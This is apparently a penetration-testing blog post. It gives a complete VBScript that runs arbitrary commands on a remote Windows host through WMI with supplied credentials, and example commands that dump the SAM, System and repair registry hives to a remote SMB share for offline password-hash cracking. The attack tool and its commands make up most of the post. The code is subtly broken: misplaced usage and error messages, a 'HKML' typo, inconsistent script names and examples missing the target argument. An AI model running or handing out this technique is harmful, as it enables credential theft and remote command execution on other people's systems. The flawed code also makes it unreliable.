Remote Windows SAM Retrieval with VBScript

There's no denying that PSExec and FGDump are useful tools on a infrastructure penetration test. FGDump is a problem however, in the fact that it needs to inject into a running process (lsass.dll) and therefore is often blocked by antivirus. Whilst you can disable AV, this isn't advisable on a production server, especially if an alternative [safe] solution is available. Since XP, there has been an option to export both the SAM and System hives from a running Windows machine, without injecting into any running processes.

The commands are simple:

reg save HKLM\SAM <filename>
reg save HKML\System <filename>

You can then import these files in Ophcrack (File->Load->'Read encrypted SAM' option), which should output some nice hashes for you to crack.

Now how to run remotely? PSExec is one option, but with WMI and VBScript, it is possible to run any remote command (and has been since Windows 2000). I prefer this method for a couple of reasons - it does not require any services or files to be copied across to the target host, and it still works in [some] situations where SRP or products such as Sanctuary are configured to block local executables from running.

The code is fairly straightforward, and mainly taken from various MSDN articles:

Option Explicit
Dim target, username, password, strCommand, objSWbemLocator, objSWbemServices, objProcess, intProcessID, errReturn
If WScript.Arguments.Count = 4 Then
target = WScript.Arguments.Item(0)
username = WScript.Arguments.Item(1)
password = WScript.Arguments.Item(2)
strCommand = WScript.Arguments.Item(3)
Wscript.Echo "Usage: vbExec.vbs target username password command"
End If
set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
set objSWbemServices = objSWbemLocator.ConnectServer(target, "root\cimv2", username, password)
objSWbemServices.Security_.ImpersonationLevel = 3
objSWbemServices.Security_.AuthenticationLevel = 6
set objProcess = objSWbemServices.Get("Win32_Process")
errReturn = objProcess.Create(strCommand, null, null, intProcessID)
If errReturn = 0 Then
Wscript.Echo "Process was started with ID: " & intProcessID
Wscript.Echo "Process could not be started due to error: " & errReturn
End If

Download from here.

So if you want to grab the SAM, or run any other command for that can do something like this...

vbsExec.vbs user password "reg save HKLM\SAM \\\writeable_share\SAM" 

vbsExec.vbs user password "reg save HKLM\System \\\writeable_share\System" 

vbsExec.vbs <target> <username> <password> <command>

NB: The above examples write the output from the reg save command straight to a remote SMB share - no need to touch the file system on the target at all!

Of course, it is worth copying the repair SAM/System files at the same time, which you can do with the following commands:

vbsExec.vbs user password "copy c:\windows\repair\SAM \\\writeable_share\SAM" 

vbsExec.vbs user password "copy c:\windows\repair\System \\\writeable_share\System"

Enjoy :)